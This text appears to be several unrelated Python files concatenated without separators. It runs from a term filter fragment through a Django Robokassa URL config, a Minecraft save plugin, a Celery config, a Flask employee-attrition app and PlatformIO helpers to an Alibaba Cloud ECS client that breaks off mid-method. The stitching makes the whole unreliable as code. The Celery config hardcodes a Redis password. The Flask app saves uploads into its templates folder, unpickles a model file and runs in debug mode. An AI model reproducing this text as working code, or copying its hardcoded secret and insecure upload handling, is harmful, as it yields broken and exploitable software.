filter_terms(input_file,output_file,abbr_full_file,full_abbr_file,use_web_score=use_web_score,numeric_cutoff=max_term_number,reject_file=reject_file,web_score_dict_file=web_score_dict_file,abbr_files=abbr_file_list) if __name__ == '__main__': sys.exit(main(sys.argv)) # coding: utf-8 try: from django.conf.urls.defaults import url except ImportError: from django.conf.urls import url from . import views as v urlpatterns = [ url(r'^result/$', v.receive_result, name='robokassa_result'), url(r'^success/$', v.success, name='robokassa_success'), url(r'^fail/$', v.fail, name='robokassa_fail'), ] #encoding:utf-8 subreddit = 'getmotivated' t_channel = '@r_getmotivated' def send_post(submission, r2t): return r2t.send_simple(submission) from mk2.plugins import Plugin from mk2.events import Hook class Save(Plugin): warn_message = Plugin.Property(default="WARNING: saving map in {delay}.") message = Plugin.Property(default="MAP IS SAVING.") warn_command = Plugin.Property(default="say %s") save_command = Plugin.Property(default="save-all") save_off_command = Plugin.Property(default="save-off") save_on_command = Plugin.Property(default="save-on") save_allowed = True def setup(self): self.register(self.save, Hook, public=True, name='save', doc='save the map') self.register(self.save_off, Hook, public=True, name='save-plugin-off', doc='Disable save plugin.') self.register(self.save_on, Hook, public=True, name='save-plugin-on', doc='Enable save plugin.') def warn(self, delay): self.send_format(self.warn_command % self.warn_message, delay=delay) def save(self, event): if (self.save_allowed): action = self.save_real if event.args: warn_length, action = self.action_chain(event.args, self.warn, action) action() event.handled = True def save_real(self): if self.message: self.send(self.warn_command % self.message) self.send(self.save_command) def save_off(self, event): self.save_allowed = False self.send(self.save_off_command) event.handled = True def save_on(self, event): self.save_allowed = True self.send(self.save_on_command) event.handled = True lsybzb/meiduomeiduo_mall/celery_tasks/config.py broker_url = "redis://:meiduo@127.0.0.1/14"app.py1-10 from flask import Flask, render_template, request, redirect, url_for,session import pandas as pd import numpy as np import pickle from werkzeug.utils import secure_filename import os from flask import jsonify #prep data def prep_data(df): cat_df = pd.get_dummies(df[['OverTime']], drop_first=True) num_df = df[['Age','HourlyRate','DailyRate','MonthlyIncome','TotalWorkingYears','YearsAtCompany','NumCompaniesWorked','DistanceFromHome']] new_df = pd.concat([num_df,cat_df], axis=1) return new_df # def allowed_file(filename): return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS UPLOAD_FOLDER = './templates' ALLOWED_EXTENSIONS = set(['csv']) ## Initialize the app app = Flask(__name__) app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER @app.route('/home') def analysis_page(): # render a static template return render_template('home.html') @app.route('/') def index(): # redirect to home return redirect(url_for('analysis_page')) @app.route('/prediction', methods=['GET','POST']) def prediction_page(): if request.method == 'POST': #check if post request has the file type if 'file' not in request.files: return render_template('home.html', error='No File part',retJson ='No file part') file = request.files['file'] # if user the did not select file if file.filename == '': return render_template ('home.html',error='No file Selected', retJson='No File Selected') #check for allowed extension if file and allowed_file(file.filename): filename = secure_filename(file.filename) file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) # load the model from disk loaded_model = pickle.load(open('./random_forest_hr_model.sav', 'rb')) # read csv data = pd.read_csv(filename) prediction = loaded_model.predict_proba(prep_data(data)) # get percentage proba retJson = [] count = 0 for prob in prediction: count+=1 retJson.append("The probability of Employee Attrition with index {} : {} % ".format(count,prob[0] * 100)) #retJson =jsonify({'retJson' :retJson}) return render_template('home.html',error=None, retJson= retJson ) # render a static template return render_template('home.html') @app.route('/attrition', methods=['GET','POST']) def single_prediction_page(): if request.method == 'POST': Age = request.form['Age'] HourlyRate = request.form['HourlyRate'] OverTime = request.form['OverTime'] DailyRate = request.form['DailyRate'] MonthlyIncome = request.form['MonthlyIncome'] TotalWorkingYears = request.form['TotalWorkingYears'] YearsAtCompany = request.form['YearsAtCompany'] NumCompaniesWorked = request.form['NumCompaniesWorked'] DistanceFromHome = request.form['DistanceFromHome'] if len(Age) <= 0 or len(HourlyRate) <= 0 or len(OverTime) <= 0 or len(DailyRate) <= 0 or len(MonthlyIncome)<= 0 or len(TotalWorkingYears) <= 0 or len(YearsAtCompany) <= 0 or len(NumCompaniesWorked) <= 0: return render_template('home.html', retJson= 'All filed is required to make prediction' ) if OverTime == 'Yes': OverTime_Yes = 1 else: OverTime_Yes = 0 #create a pandas dataframe df = pd.DataFrame([{'Age': Age, 'HourlyRate': HourlyRate,'DailyRate':DailyRate, 'MonthlyIncome': MonthlyIncome, 'TotalWorkingYears':TotalWorkingYears, 'YearsAtCompany': YearsAtCompany, 'NumCompaniesWorked':NumCompaniesWorked, 'DistanceFromHome':DistanceFromHome, 'OverTime_Yes': OverTime_Yes}]) loaded_model = pickle.load(open('./random_forest_hr_model.sav', 'rb')) #print(df.head()) #temp = [ Age, HourlyRate, DailyRate, MonthlyIncome,TotalWorkingYears, YearsAtCompany, NumCompaniesWorked,DistanceFromHome, OverTime_Yes] #temp = np.reshape(1,-1) prediction = loaded_model.predict_proba(df) retJson = [] for prob in prediction: retJson.append("The probability is : {} % ".format(prob[0] * 100)) return render_template('prob.html',error=None, retJson= retJson ) # render a static template return render_template('home.html') if __name__ =='__main__': app.run(debug=True) # Copyright (c) 2014-present PlatformIO <> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import os from hashlib import sha1 from os import walk from os.path import (basename, dirname, expanduser, isdir, isfile, join, realpath, splitdrive) from click.testing import CliRunner from platformio import __version__, exception from platformio.compat import WINDOWS, hashlib_encode_data from platformio.project.config import ProjectConfig def get_project_dir(): return os.getcwd() def is_platformio_project(project_dir=None): if not project_dir: project_dir = get_project_dir() return isfile(join(project_dir, "platformio.ini")) def find_project_dir_above(path): if isfile(path): path = dirname(path) if is_platformio_project(path): return path if isdir(dirname(path)): return find_project_dir_above(dirname(path)) return None def get_project_optional_dir(name, default=None): project_dir = get_project_dir() config = ProjectConfig.get_instance(join(project_dir, "platformio.ini")) optional_dir = config.get("platformio", name) if not optional_dir: return default if "$PROJECT_HASH" in optional_dir: optional_dir = optional_dir.replace( "$PROJECT_HASH", "%s-%s" % (basename(project_dir), sha1( hashlib_encode_data(project_dir)).hexdigest()[:10])) if optional_dir.startswith("~"): optional_dir = expanduser(optional_dir) return realpath(optional_dir) def get_project_core_dir(): default = join(expanduser("~"), ".platformio") core_dir = get_project_optional_dir( "core_dir", get_project_optional_dir("home_dir", default)) win_core_dir = None if WINDOWS and core_dir == default: win_core_dir = splitdrive(core_dir)[0] + "\\.platformio" if isdir(win_core_dir): core_dir = win_core_dir if not isdir(core_dir): try: os.makedirs(core_dir) except OSError as e: if win_core_dir: os.makedirs(win_core_dir) core_dir = win_core_dir else: raise e assert isdir(core_dir) return core_dir def get_project_global_lib_dir(): return get_project_optional_dir("globallib_dir", join(get_project_core_dir(), "lib")) def get_project_platforms_dir(): return get_project_optional_dir("platforms_dir", join(get_project_core_dir(), "platforms")) def get_project_packages_dir(): return get_project_optional_dir("packages_dir", join(get_project_core_dir(), "packages")) def get_project_cache_dir(): return get_project_optional_dir("cache_dir", join(get_project_core_dir(), ".cache")) def get_project_workspace_dir(): return get_project_optional_dir("workspace_dir", join(get_project_dir(), ".pio")) def get_project_build_dir(force=False): path = get_project_optional_dir("build_dir", join(get_project_workspace_dir(), "build")) try: if not isdir(path): os.makedirs(path) except Exception as e: # pylint: disable=broad-except if not force: raise Exception(e) return path def get_project_libdeps_dir(): return get_project_optional_dir( "libdeps_dir", join(get_project_workspace_dir(), "libdeps")) def get_project_lib_dir(): return get_project_optional_dir("lib_dir", join(get_project_dir(), "lib")) def get_project_include_dir(): return get_project_optional_dir("include_dir", join(get_project_dir(), "include")) def get_project_src_dir(): return get_project_optional_dir("src_dir", join(get_project_dir(), "src")) def get_project_test_dir(): return get_project_optional_dir("test_dir", join(get_project_dir(), "test")) def get_project_boards_dir(): return get_project_optional_dir("boards_dir", join(get_project_dir(), "boards")) def get_project_data_dir(): return get_project_optional_dir("data_dir", join(get_project_dir(), "data")) def get_project_shared_dir(): return get_project_optional_dir("shared_dir", join(get_project_dir(), "shared")) def compute_project_checksum(config): # rebuild when PIO Core version changes checksum = sha1(hashlib_encode_data(__version__)) # configuration file state checksum.update(hashlib_encode_data(config.to_json())) # project file structure check_suffixes = (".c", ".cc", ".cpp", ".h", ".hpp", ".s", ".S") for d in (get_project_include_dir(), get_project_src_dir(), get_project_lib_dir()): if not isdir(d): continue chunks = [] for root, _, files in walk(d): for f in files: path = join(root, f) if path.endswith(check_suffixes): chunks.append(path) if not chunks: continue chunks_to_str = ",".join(sorted(chunks)) if WINDOWS: # case insensitive OS chunks_to_str = chunks_to_str.lower() checksum.update(hashlib_encode_data(chunks_to_str)) return checksum.hexdigest() def load_project_ide_data(project_dir, env_name): from platformio.commands.run import cli as cmd_run result = CliRunner().invoke(cmd_run, [ "--project-dir", project_dir, "--environment", env_name, "--target", "idedata" ]) if result.exit_code != 0 and not isinstance(result.exception, exception.ReturnErrorCode): raise result.exception if '"includes":' not in result.output: raise exception.PlatformioException(result.output) for line in result.output.split("\n"): line = line.strip() if line.startswith('{"') and line.endswith("}"): return json.loads(line) return None 10-100 # Copyright 2019 Alibaba Cloud Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from alibabacloud.client import AlibabaCloudClient from alibabacloud.request import APIRequest from alibabacloud.utils.parameter_validation import verify_params class EcsClient(AlibabaCloudClient): def __init__(self, client_config, credentials_provider=None, retry_policy=None, endpoint_resolver=None): AlibabaCloudClient.__init__(self, client_config, credentials_provider=credentials_provider, retry_policy=retry_policy, endpoint_resolver=endpoint_resolver) self.product_code = 'Ecs' self.api_version = '2014-05-26' self.location_service_code = 'ecs' self.location_endpoint_type = 'openAPI' def delete_instances( self, resource_owner_id=None, list_of_instance_id=None, dry_run=None, resource_owner_account=None, client_token=None, owner_account=None, terminate_subscription=None, force=None, owner_id=None): api_request = APIRequest('DeleteInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": list_of_instance_id, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "TerminateSubscription": terminate_subscription, "Force": force, "OwnerId": owner_id} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_storage_set_attribute( self, resource_owner_id=None, client_token=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, storage_set_id=None, storage_set_name=None): api_request = APIRequest('ModifyStorageSetAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "StorageSetId": storage_set_id, "StorageSetName": storage_set_name} return self._handle_request(api_request).result def describe_storage_sets( self, resource_owner_id=None, client_token=None, storage_set_ids=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, zone_id=None, storage_set_name=None): api_request = APIRequest('DescribeStorageSets', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "StorageSetIds": storage_set_ids, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ZoneId": zone_id, "StorageSetName": storage_set_name} return self._handle_request(api_request).result def describe_storage_set_details( self, resource_owner_id=None, client_token=None, page_number=None, region_id=None, page_size=None, storage_set_partition_number=None, disk_ids=None, resource_owner_account=None, owner_account=None, owner_id=None, storage_set_id=None): api_request = APIRequest('DescribeStorageSetDetails', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "StorageSetPartitionNumber": storage_set_partition_number, "DiskIds": disk_ids, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "StorageSetId": storage_set_id} return self._handle_request(api_request).result def delete_storage_set( self, resource_owner_id=None, client_token=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, storage_set_id=None): api_request = APIRequest('DeleteStorageSet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "StorageSetId": storage_set_id} return self._handle_request(api_request).result def create_storage_set( self, resource_owner_id=None, client_token=None, max_partition_number=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, zone_id=None, storage_set_name=None): api_request = APIRequest('CreateStorageSet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "MaxPartitionNumber": max_partition_number, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ZoneId": zone_id, "StorageSetName": storage_set_name} return self._handle_request(api_request).result def modify_disk_spec( self, resource_owner_id=None, disk_id=None, resource_owner_account=None, performance_level=None, owner_account=None, owner_id=None): api_request = APIRequest('ModifyDiskSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "DiskId": disk_id, "ResourceOwnerAccount": resource_owner_account, "PerformanceLevel": performance_level, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_auto_provisioning_group( self, resource_owner_id=None, terminate_instances_with_expiration=None, region_id=None, default_target_capacity_type=None, excess_capacity_termination_policy=None, resource_owner_account=None, owner_account=None, owner_id=None, auto_provisioning_group_id=None, pay_as_you_go_target_capacity=None, total_target_capacity=None, spot_target_capacity=None, max_spot_price=None, auto_provisioning_group_name=None): api_request = APIRequest('ModifyAutoProvisioningGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "TerminateInstancesWithExpiration": terminate_instances_with_expiration, "RegionId": region_id, "DefaultTargetCapacityType": default_target_capacity_type, "ExcessCapacityTerminationPolicy": excess_capacity_termination_policy, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "AutoProvisioningGroupId": auto_provisioning_group_id, "PayAsYouGoTargetCapacity": pay_as_you_go_target_capacity, "TotalTargetCapacity": total_target_capacity, "SpotTargetCapacity": spot_target_capacity, "MaxSpotPrice": max_spot_price, "AutoProvisioningGroupName": auto_provisioning_group_name} return self._handle_request(api_request).result def describe_auto_provisioning_groups( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, list_of_auto_provisioning_group_status=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_auto_provisioning_group_id=None, auto_provisioning_group_name=None): api_request = APIRequest('DescribeAutoProvisioningGroups', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "AutoProvisioningGroupStatus": list_of_auto_provisioning_group_status, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "AutoProvisioningGroupId": list_of_auto_provisioning_group_id, "AutoProvisioningGroupName": auto_provisioning_group_name} repeat_info = { "AutoProvisioningGroupStatus": ( 'AutoProvisioningGroupStatus', 'list', 'str', None), "AutoProvisioningGroupId": ( 'AutoProvisioningGroupId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_auto_provisioning_group_instances( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, auto_provisioning_group_id=None): api_request = APIRequest('DescribeAutoProvisioningGroupInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "AutoProvisioningGroupId": auto_provisioning_group_id} return self._handle_request(api_request).result def delete_auto_provisioning_group( self, resource_owner_id=None, region_id=None, terminate_instances=None, resource_owner_account=None, owner_account=None, owner_id=None, auto_provisioning_group_id=None): api_request = APIRequest('DeleteAutoProvisioningGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "TerminateInstances": terminate_instances, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "AutoProvisioningGroupId": auto_provisioning_group_id} return self._handle_request(api_request).result def create_auto_provisioning_group( self, resource_owner_id=None, auto_provisioning_group_type=None, description=None, terminate_instances_with_expiration=None, resource_group_id=None, spot_allocation_strategy=None, region_id=None, terminate_instances=None, pay_as_you_go_allocation_strategy=None, default_target_capacity_type=None, excess_capacity_termination_policy=None, list_of_launch_template_config=None, valid_until=None, spot_instance_interruption_behavior=None, launch_template_id=None, resource_owner_account=None, owner_account=None, spot_instance_pools_to_use_count=None, owner_id=None, launch_template_version=None, pay_as_you_go_target_capacity=None, total_target_capacity=None, spot_target_capacity=None, valid_from=None, auto_provisioning_group_name=None, max_spot_price=None): api_request = APIRequest('CreateAutoProvisioningGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AutoProvisioningGroupType": auto_provisioning_group_type, "Description": description, "TerminateInstancesWithExpiration": terminate_instances_with_expiration, "ResourceGroupId": resource_group_id, "SpotAllocationStrategy": spot_allocation_strategy, "RegionId": region_id, "TerminateInstances": terminate_instances, "PayAsYouGoAllocationStrategy": pay_as_you_go_allocation_strategy, "DefaultTargetCapacityType": default_target_capacity_type, "ExcessCapacityTerminationPolicy": excess_capacity_termination_policy, "LaunchTemplateConfig": list_of_launch_template_config, "ValidUntil": valid_until, "SpotInstanceInterruptionBehavior": spot_instance_interruption_behavior, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SpotInstancePoolsToUseCount": spot_instance_pools_to_use_count, "OwnerId": owner_id, "LaunchTemplateVersion": launch_template_version, "PayAsYouGoTargetCapacity": pay_as_you_go_target_capacity, "TotalTargetCapacity": total_target_capacity, "SpotTargetCapacity": spot_target_capacity, "ValidFrom": valid_from, "AutoProvisioningGroupName": auto_provisioning_group_name, "MaxSpotPrice": max_spot_price} repeat_info = { "LaunchTemplateConfig": ( 'LaunchTemplateConfig', 'list', 'dict', [ ('InstanceType', 'str', None, None), ('MaxPrice', 'str', None, None), ('VSwitchId', 'str', None, None), ('WeightedCapacity', 'str', None, None), ('Priority', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_auto_provisioning_group_history( self, resource_owner_id=None, start_time=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None, auto_provisioning_group_id=None): api_request = APIRequest('DescribeAutoProvisioningGroupHistory', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "StartTime": start_time, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "AutoProvisioningGroupId": auto_provisioning_group_id} return self._handle_request(api_request).result def report_instances_status( self, reason=None, resource_owner_id=None, description=None, start_time=None, region_id=None, list_of_disk_id=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None, list_of_instance_id=None, list_of_device=None): api_request = APIRequest('ReportInstancesStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "Reason": reason, "ResourceOwnerId": resource_owner_id, "Description": description, "StartTime": start_time, "RegionId": region_id, "DiskId": list_of_disk_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "InstanceId": list_of_instance_id, "Device": list_of_device} repeat_info = {"DiskId": ('DiskId', 'list', 'str', None), "InstanceId": ('InstanceId', 'list', 'str', None), "Device": ('Device', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_fleet( self, resource_owner_id=None, terminate_instances_with_expiration=None, on_demand_target_capacity=None, region_id=None, default_target_capacity_type=None, excess_capacity_termination_policy=None, resource_owner_account=None, owner_account=None, owner_id=None, fleet_id=None, total_target_capacity=None, spot_target_capacity=None, max_spot_price=None): api_request = APIRequest('ModifyFleet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "TerminateInstancesWithExpiration": terminate_instances_with_expiration, "OnDemandTargetCapacity": on_demand_target_capacity, "RegionId": region_id, "DefaultTargetCapacityType": default_target_capacity_type, "ExcessCapacityTerminationPolicy": excess_capacity_termination_policy, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": fleet_id, "TotalTargetCapacity": total_target_capacity, "SpotTargetCapacity": spot_target_capacity, "MaxSpotPrice": max_spot_price} return self._handle_request(api_request).result def describe_fleets( self, resource_owner_id=None, page_number=None, fleet_name=None, list_of_fleet_status=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_fleet_id=None): api_request = APIRequest('DescribeFleets', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "FleetName": fleet_name, "FleetStatus": list_of_fleet_status, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": list_of_fleet_id} repeat_info = {"FleetStatus": ('FleetStatus', 'list', 'str', None), "FleetId": ('FleetId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_fleet_instances( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, fleet_id=None): api_request = APIRequest('DescribeFleetInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": fleet_id} return self._handle_request(api_request).result def describe_fleet_history( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, fleet_id=None): api_request = APIRequest('DescribeFleetHistory', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": fleet_id} return self._handle_request(api_request).result def delete_fleet( self, resource_owner_id=None, region_id=None, terminate_instances=None, resource_owner_account=None, owner_account=None, owner_id=None, fleet_id=None): api_request = APIRequest('DeleteFleet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "TerminateInstances": terminate_instances, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "FleetId": fleet_id} return self._handle_request(api_request).result def create_fleet( self, resource_owner_id=None, fleet_type=None, description=None, terminate_instances_with_expiration=None, on_demand_target_capacity=None, fleet_name=None, spot_allocation_strategy=None, region_id=None, terminate_instances=None, default_target_capacity_type=None, excess_capacity_termination_policy=None, list_of_launch_template_config=None, valid_until=None, fill_gap_with_on_demand=None, spot_instance_interruption_behavior=None, launch_template_id=None, resource_owner_account=None, owner_account=None, spot_instance_pools_to_use_count=None, owner_id=None, launch_template_version=None, total_target_capacity=None, on_demand_allocation_strategy=None, spot_target_capacity=None, valid_from=None, max_spot_price=None): api_request = APIRequest('CreateFleet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "FleetType": fleet_type, "Description": description, "TerminateInstancesWithExpiration": terminate_instances_with_expiration, "OnDemandTargetCapacity": on_demand_target_capacity, "FleetName": fleet_name, "SpotAllocationStrategy": spot_allocation_strategy, "RegionId": region_id, "TerminateInstances": terminate_instances, "DefaultTargetCapacityType": default_target_capacity_type, "ExcessCapacityTerminationPolicy": excess_capacity_termination_policy, "LaunchTemplateConfig": list_of_launch_template_config, "ValidUntil": valid_until, "FillGapWithOnDemand": fill_gap_with_on_demand, "SpotInstanceInterruptionBehavior": spot_instance_interruption_behavior, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SpotInstancePoolsToUseCount": spot_instance_pools_to_use_count, "OwnerId": owner_id, "LaunchTemplateVersion": launch_template_version, "TotalTargetCapacity": total_target_capacity, "OnDemandAllocationStrategy": on_demand_allocation_strategy, "SpotTargetCapacity": spot_target_capacity, "ValidFrom": valid_from, "MaxSpotPrice": max_spot_price} repeat_info = { "LaunchTemplateConfig": ( 'LaunchTemplateConfig', 'list', 'dict', [ ('InstanceType', 'str', None, None), ('MaxPrice', 'str', None, None), ('VSwitchId', 'str', None, None), ('WeightedCapacity', 'str', None, None), ('Priority', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_reserved_instance_attribute( self, resource_owner_id=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, reserved_instance_id=None, reserved_instance_name=None): api_request = APIRequest('ModifyReservedInstanceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ReservedInstanceId": reserved_instance_id, "ReservedInstanceName": reserved_instance_name} return self._handle_request(api_request).result def purchase_reserved_instances_offering( self, resource_owner_id=None, client_token=None, description=None, resource_group_id=None, region_id=None, scope=None, instance_type=None, period=None, resource_owner_account=None, owner_account=None, owner_id=None, period_unit=None, offering_type=None, zone_id=None, reserved_instance_name=None, instance_amount=None): api_request = APIRequest('PurchaseReservedInstancesOffering', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "Description": description, "ResourceGroupId": resource_group_id, "RegionId": region_id, "Scope": scope, "InstanceType": instance_type, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PeriodUnit": period_unit, "OfferingType": offering_type, "ZoneId": zone_id, "ReservedInstanceName": reserved_instance_name, "InstanceAmount": instance_amount} return self._handle_request(api_request).result def modify_reserved_instances( self, resource_owner_id=None, list_of_configuration=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_reserved_instance_id=None): api_request = APIRequest('ModifyReservedInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Configuration": list_of_configuration, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ReservedInstanceId": list_of_reserved_instance_id} repeat_info = {"Configuration": ('Configuration', 'list', 'dict', [('ZoneId', 'str', None, None), ('ReservedInstanceName', 'str', None, None), ('InstanceType', 'str', None, None), ('Scope', 'str', None, None), ('InstanceAmount', 'str', None, None), ]), "ReservedInstanceId": ('ReservedInstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_reserved_instances( self, resource_owner_id=None, page_number=None, lock_reason=None, region_id=None, scope=None, page_size=None, instance_type=None, resource_owner_account=None, owner_account=None, instance_type_family=None, owner_id=None, list_of_reserved_instance_id=None, offering_type=None, zone_id=None, reserved_instance_name=None, list_of_status=None): api_request = APIRequest('DescribeReservedInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "LockReason": lock_reason, "RegionId": region_id, "Scope": scope, "PageSize": page_size, "InstanceType": instance_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "InstanceTypeFamily": instance_type_family, "OwnerId": owner_id, "ReservedInstanceId": list_of_reserved_instance_id, "OfferingType": offering_type, "ZoneId": zone_id, "ReservedInstanceName": reserved_instance_name, "Status": list_of_status} repeat_info = {"ReservedInstanceId": ('ReservedInstanceId', 'list', 'str', None), "Status": ('Status', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_demands( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, instance_type=None, list_of_tag=None, instance_charge_type=None, dry_run=None, resource_owner_account=None, owner_account=None, instance_type_family=None, owner_id=None, list_of_demand_status=None, zone_id=None): api_request = APIRequest('DescribeDemands', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "InstanceType": instance_type, "Tag": list_of_tag, "InstanceChargeType": instance_charge_type, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "InstanceTypeFamily": instance_type_family, "OwnerId": owner_id, "DemandStatus": list_of_demand_status, "ZoneId": zone_id} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "DemandStatus": ('DemandStatus', 'list', 'str', None), } 